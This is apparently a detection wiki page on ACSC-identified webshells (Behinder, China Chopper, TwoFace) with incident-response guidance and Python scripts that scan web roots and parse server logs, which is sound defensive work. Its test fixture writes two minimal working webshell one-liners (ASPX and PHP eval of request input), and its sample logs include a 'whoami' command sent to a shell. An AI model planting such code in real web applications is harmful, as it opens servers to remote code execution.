ACSC Webshells [0.1]
A finding under this detection indicates that a file with characteristics matching a known attacker webshell, as identified by the ACSC, has been found.
The ACSC disclosed in a recent advisory an increase in attackers leveraging proof-of-concept open source exploits, code and tools. Webshells are one of many tactics, techniques and procedures (TTPs) identified within this advisory.
A webshell is a malicious script placed by an attacker on a web server and used to remotely access the server and launch further attacks. Many webshell variants exist, but they can typically be characterised by being uploaded to a web server in order to establish remote access, escalate privileges or maintain persistence on a system.
This search looks for any files which may suggest the presence of webshells identified within advisory 2020-008, using intelligence provided by the ACSC and by other sources such as CyberCX and CrowdStrike investigations. See the threat intelligence sources section below for further details. Findings are based upon threat intelligence alone, and do not consider environmental factors specific to the computer or network being scanned.
CyberCX.ACSC.2020008.Webshells
The threat intelligence sources used to develop these detections include:
- Those provided by the ACSC advisory 2020-008 on ‘Copy and Paste’ attacks and released as Traffic Light Protocol (TLP): White.
- Investigations performed by the CyberCX DFIR team
- Investigations performed by CrowdStrike
- Contributions from the community
A finding does not by itself confirm compromise of your system, but may well be indicative of attacker activity. Review each detection in context to confirm whether the finding is definitively malicious or a false positive. Guidance on how to approach these investigations is provided within this section.
This section provides general guidance on how to determine if a finding is indicative of malicious activity. Please note the specific detection results within the report generated by CCX Digger when conducting the investigation, as some of the content below may not be applicable for your system.
These guides do not consider contextual usage, such as environment, applications and expected activity for the computer. The review should consider what activity is expected in conjunction with webshell file detection results.
Detecting webshells may be difficult, as they are easily modifiable and are often obfuscated. An alert for any potential webshell should be validated to identify the file's origin and authenticity.
A file has been detected which demonstrates some characteristics of a webshell as identified within the ACSC 2020-008 advisory. This detection is generic and may be a false positive: it identifies capabilities common to many webshells, including the ability to run arbitrary text as code, such as an eval call fed from request input. Further investigation is necessary to determine whether this capability is expected for an authorised web application and whether the behaviour is intended.
Is the file in a path containing hosted web server files?
- If not, this detection may not indicate an imminent threat; however, further investigation is required to determine how this file reached the computer.
- If so, check with the website creator or administrator to determine whether this is expected, and why, as this type of code is unlikely to be present on a website under normal circumstances. If there is a legitimate reason for it to be there, weigh that reason against the security risks which exploitable webpages can cause. For example, eval functions acting on user-supplied input can introduce dangerous, though sometimes difficult to exploit, vulnerabilities which can lead to remote code execution.
- Observe what happens when the page script is visited on the website by visiting website.name/script/location. Note that the request executes the script on the server, so preserve a copy of the file and its timestamps first, and do not send it any parameters. If anything but an error is returned, the webshell can be reached from any location that can access the website. Even if the webshell is active, it may still return an error, for example if it expects to receive encrypted code.
- If the webshell is active, evidence of access to it should be recorded within web server logs, such as Microsoft IIS or Apache logs. Examine these to determine whether such activity exists and what the webshell was used for at the time. Look for any request parameters which may help determine whether specific commands were sent to the webshell. Be aware that the default IIS and Apache log formats record the query string but not the POST body, which is where many webshell clients send their commands, so a POST request to the file with an empty query string is still significant.
- The creation date of the file may indicate when it was placed on the server, although an attacker can alter file timestamps, so corroborate the date against log entries. Investigate any activity around this date in the web server and system logs to determine whether other malicious activity occurred.
- Investigate other files within the same directory as this webshell, as attackers often place related files in the same location.
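The checks in the list above (is the file under a web root, does it carry a generic run-text-as-code capability, and what else in its directory was written around the same time) can be scripted. The following is an added example and is not CCX Digger's own detection logic or the ACSC's signatures: the heuristic patterns, the sample files and the web root it creates in a temporary directory are all constructed here for illustration, and it compares modification time rather than creation time because creation time cannot be set on the constructed sample.

```python
# Added example: webroot triage for a flagged file. The heuristic patterns and
# the sample web root below are constructed for illustration; they are not
# CCX Digger's detection rules or the ACSC's indicators.
import os
import re
import tempfile
import time
from datetime import datetime

# Generic "run arbitrary text as code" markers (illustrative, not the page's signatures).
CODE_EXEC_PATTERNS = [
    ("aspx_eval_request", re.compile(r'eval\s*\(\s*Request\.(Item|Form|QueryString)', re.I)),
    ("php_eval_request", re.compile(r'eval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[', re.I)),
    ("php_eval_decoded", re.compile(r'eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(', re.I)),
    ("dotnet_assembly_load", re.compile(r'Assembly\.Load\s*\(', re.I)),
]
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx", ".php", ".jsp", ".jspx"}


def under_webroot(path, webroots):
    """Return the web root that contains `path`, or None if it is outside all of them."""
    real = os.path.realpath(path)
    for root in webroots:
        r = os.path.realpath(root)
        if real == r or real.startswith(r + os.sep):
            return r
    return None


def match_patterns(path):
    """Labels of every heuristic that fires on the file's text."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return []
    return [label for label, rx in CODE_EXEC_PATTERNS if rx.search(text)]


def scan_webroot(root):
    """Walk a web root and report each script file that shows code-execution markers."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            labels = match_patterns(full)
            if labels:
                findings.append({"path": full, "name": name, "labels": labels,
                                 "mtime": datetime.fromtimestamp(os.path.getmtime(full))})
    return sorted(findings, key=lambda f: f["path"])


def siblings_near(path, window_hours=24):
    """Other files in the flagged file's directory written within +/- window_hours of it.

    Modification time is used because creation time cannot be set on the
    sample; on a real server compare the file system's creation time as well.
    """
    ref = os.path.getmtime(path)
    directory = os.path.dirname(path)
    near = []
    for name in os.listdir(directory):
        full = os.path.join(directory, name)
        if full != path and os.path.isfile(full) and \
                abs(os.path.getmtime(full) - ref) <= window_hours * 3600:
            near.append(name)
    return sorted(near)


def build_sample_webroot():
    """Create a throwaway web root: one benign page, two suspect scripts, two other files."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "uploads"))
    old, recent = time.time() - 30 * 86400, time.time() - 3600
    samples = {  # constructed sample content, with a backdated mtime for the old files
        "default.aspx": ('<%@ Page Language="C#" %><html>Hello</html>', old),
        "uploads/x.aspx": ('<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>', recent),
        "uploads/img.php": ('<?php eval(base64_decode($_POST["c"])); ?>', recent),
        "uploads/readme.txt": ("release notes", old),
        "uploads/tools.txt": ("dropped alongside the shell", recent),
    }
    for rel, (body, mtime) in samples.items():
        full = os.path.join(root, *rel.split("/"))
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(full, (mtime, mtime))
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for f in scan_webroot(root):
        print(f["name"], f["labels"], f["mtime"], "siblings:", siblings_near(f["path"]))
```

Run stand-alone it prints the two suspect scripts with the heuristic that fired and the files written in the same directory within a day of each; the old `readme.txt` only appears once the window is widened. On a real host, pass the actual web roots (for IIS, each site's physical path; for Apache, each DocumentRoot and alias) to `under_webroot` and point `scan_webroot` at them.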
A webshell was found which is characteristic of the Behinder webshell, as identified within the ACSC 2020-008 advisory. This webshell allows attackers to execute code, and is capable of receiving AES-encrypted .NET assembly code.
Is the file in a path containing hosted web server files?
- If not, this detection may not indicate an imminent threat; however, further investigation is required to determine when and how this file reached the computer.
- If so, check with the website creator or administrator to determine whether this is expected, and why, as this type of code is unlikely to be present on a website under normal circumstances. If there is a legitimate reason for it to be there, weigh that reason against the security risks which exploitable webpages can cause. For example, eval functions acting on user-supplied input can introduce dangerous, though sometimes difficult to exploit, vulnerabilities which can lead to remote code execution.
- Do not open or execute the file on the web server itself (for example by double-clicking it or running it through a script interpreter). If this is a legitimate alert, doing so may run malicious code on your web server. Instead, check the web server software for any security controls which may prevent the webshell from being run externally.
- Observe what happens when the page script is visited on the website by visiting website.name/script/location. If anything but an error is returned, the webshell can be reached from any location from which the website is accessible. Even if the webshell is active, it may still return an error, as Behinder expects to receive encrypted code rather than a plain request.
- If the webshell is active, evidence of access to it should be recorded within web server logs, such as Microsoft IIS or Apache logs. Examine these to determine whether such activity exists and what the webshell was used for at the time. Look for any request parameters which may help determine whether specific commands were sent to this webshell.
- The creation date of the webshell may indicate when the file was placed on the computer. Investigate any activity around this date in the web server and system logs to determine whether other malicious activity occurred.
- Investigate other files within the same web server directory as this file, as attacker-uploaded files are often placed in the same location when a website is compromised.
A webshell was found which is characteristic of the China Chopper webshell, as identified within the ACSC 2020-008 advisory. This webshell allows files to be downloaded or uploaded and Microsoft .NET code to be injected and executed.
Is the file in a path containing hosted web server files?
- If not, this detection may not indicate an imminent threat; however, further investigation is required to determine how this file reached the computer.
- If so, check with the website creator to determine whether this is expected, and why, as this type of code is unlikely to be present on a website under normal circumstances. If there is a legitimate reason for it to be there, weigh that reason against the security risks which exploitable webpages can cause. Eval functions acting on user-supplied input can introduce dangerous, though sometimes difficult to exploit, vulnerabilities which can lead to remote code execution.
- Do not open or execute the file on the web server itself (for example by double-clicking it or running it through a script interpreter). If this is a legitimate alert, doing so may run malicious code on your web server. Instead, check the web server software for any security controls which may prevent the webshell from being run externally.
- Observe what happens when the page script is visited on the website by visiting website.name/script/location. If anything but an error is returned, the webshell can be reached from any location from which the website is accessible. Even if the webshell is active, it may still return an error or a blank page, as China Chopper only acts on a request that carries its expected parameter.
- If the webshell is active, evidence of access to it should be recorded within web server logs, such as Microsoft IIS or Apache logs. Examine these to determine whether such activity exists and what the webshell was used for at the time. Look for any request parameters which may help determine whether specific commands were sent to this webshell.
- The creation date of the file may indicate when the file was placed on the computer. Investigate any activity around this date in the web server and system logs to determine whether other malicious activity occurred.
- Investigate other files within the same web server directory as this file, as attacker-uploaded files are often placed in the same location when a website is compromised.
A webshell was found which is characteristic of the TwoFace or HighShell webshell, as identified within the ACSC 2020-008 advisory.
This webshell is intended to run on web servers using ASP.NET. It typically disguises its malicious content by appearing to be a legitimate page when a user accesses it in a browser.
- Do not open or execute the file on the web server itself (for example by double-clicking it or running it through a script interpreter). If this is a legitimate alert, doing so may run malicious code on your web server. Instead, check the web server software for any security controls which may prevent the webshell from being run externally. For example, this may involve settings on the web server program, such as Microsoft IIS or Apache, which control the specific files that can be served as webpages. Access could also be prevented by firewall rules or an Intrusion Prevention System (IPS) blocking attempted connections to this webshell. If no controls are found which would prevent this access, this webshell could potentially be exploited from any location from which the website is accessible.
- If the webshell is active, evidence of access to it should be recorded within web server logs, such as Microsoft IIS or Apache logs. Examine these to determine whether such activity exists and what the webshell was used for at the time. Look for any request parameters which may help determine whether specific commands were sent to this webshell.
- The creation date of the file may indicate when the file was placed on the computer. Investigate any activity around this date in the web server and system logs to determine whether other malicious activity occurred.
- Investigate other files within the same web server directory as this file, as attacker-uploaded files are often placed in the same location when a website is compromised.
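The log review step that each of the webshell sections above calls for (find every request to the suspected file in the IIS or Apache logs, then look at the parameters and timing) is shown below as an added example; it is not code from this page or from CCX Digger. The script parses IIS W3C extended log lines using their `#Fields:` header and Apache combined-format lines, keeps only requests to the suspected path, and summarises per client address the methods, status codes, user agents, query parameters and time range. The log lines, the client addresses and the paths /uploads/x.aspx and /uploads/img.php are constructed for this illustration. Neither log format records the POST body, which is where Behinder and China Chopper clients send their commands, so the summary counts POSTs separately rather than dismissing them for having no query string.

```python
# Added example: pull every request to a suspected webshell out of IIS W3C and
# Apache combined logs. The log lines, client addresses and the paths
# /uploads/x.aspx and /uploads/img.php are constructed for this illustration.
import re
from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import parse_qs

# Constructed IIS W3C extended log; the #Fields: line names the columns.
IIS_SAMPLE = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2020-06-18 02:14:07 10.0.0.5 GET /uploads/x.aspx - 443 203.0.113.7 Mozilla/5.0 200
2020-06-18 02:14:21 10.0.0.5 POST /uploads/x.aspx - 443 203.0.113.7 Mozilla/5.0 200
2020-06-18 02:15:03 10.0.0.5 GET /uploads/x.aspx cmd=whoami 443 203.0.113.7 curl/7.68.0 200
2020-06-18 02:16:40 10.0.0.5 GET /default.aspx - 443 198.51.100.4 Mozilla/5.0 200
"""
# Constructed Apache combined log for a PHP shell on another host.
APACHE_SAMPLE = """\
203.0.113.7 - - [18/Jun/2020:02:20:11 +0000] "POST /uploads/img.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Jun/2020:02:20:15 +0000] "GET /uploads/img.php?c=aWQ= HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Jun/2020:02:21:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')


def parse_iis(text):
    """Yield one record per IIS data line, taking column names from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split(" ")))  # IIS writes spaces inside values as '+'
            ts = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield {"ts": ts.replace(tzinfo=timezone.utc),  # IIS logs in UTC by default
                   "ip": row["c-ip"], "method": row["cs-method"], "path": row["cs-uri-stem"],
                   "query": "" if row["cs-uri-query"] == "-" else row["cs-uri-query"],
                   "status": int(row["sc-status"]), "ua": row.get("cs(User-Agent)", "")}


def parse_apache(text):
    """Yield one record per Apache combined-format line."""
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if m:
            path, _, query = m.group("uri").partition("?")
            yield {"ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
                   "ip": m.group("ip"), "method": m.group("method"), "path": path,
                   "query": query, "status": int(m.group("status")), "ua": m.group("ua")}


def requests_to(records, shell_path):
    """Requests whose URI stem is the suspected webshell (compared case-insensitively, as IIS does)."""
    return [r for r in records if r["path"].lower() == shell_path.lower()]


def summarise(hits):
    """Per client address: request counts, methods, statuses, query parameters and time range.

    Neither log format records the POST body, which is where Behinder and
    China Chopper clients send their commands, so POSTs are counted separately
    instead of being dismissed for having no query string.
    """
    out = {}
    for r in hits:
        s = out.setdefault(r["ip"], {"count": 0, "posts": 0, "methods": set(), "statuses": set(),
                                     "user_agents": set(), "params": defaultdict(list),
                                     "first": r["ts"], "last": r["ts"]})
        s["count"] += 1
        if r["method"] == "POST":
            s["posts"] += 1
        s["methods"].add(r["method"])
        s["statuses"].add(r["status"])
        s["user_agents"].add(r["ua"])
        for key, values in parse_qs(r["query"]).items():
            s["params"][key].extend(values)
        s["first"], s["last"] = min(s["first"], r["ts"]), max(s["last"], r["ts"])
    return {ip: dict(s, params=dict(s["params"])) for ip, s in out.items()}


if __name__ == "__main__":
    records = list(parse_iis(IIS_SAMPLE)) + list(parse_apache(APACHE_SAMPLE))
    for shell in ("/uploads/x.aspx", "/uploads/img.php"):
        for ip, s in summarise(requests_to(records, shell)).items():
            print(shell, ip, s["count"], "requests", s["posts"], "POSTs", s["params"],
                  s["first"].isoformat(), "to", s["last"].isoformat())
```

Replace the two sample strings with the contents of the real log files (IIS logs live under the site's logging directory, commonly `%SystemDrive%\inetpub\logs\LogFiles\W3SVC<n>`; Apache's under its configured CustomLog path) and pass the suspected file's URI path. The first-seen time per address is the value to compare against the file's creation date, and a single address that mixes browser and tool user agents against the same script is worth close attention.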
- https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf
- https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF
If you have followed the investigations to confirm the validity of the findings, and believe your system may be at risk, please visit the Need Help? page for further instructions. Please refer to the same page for further context on how to use this wiki.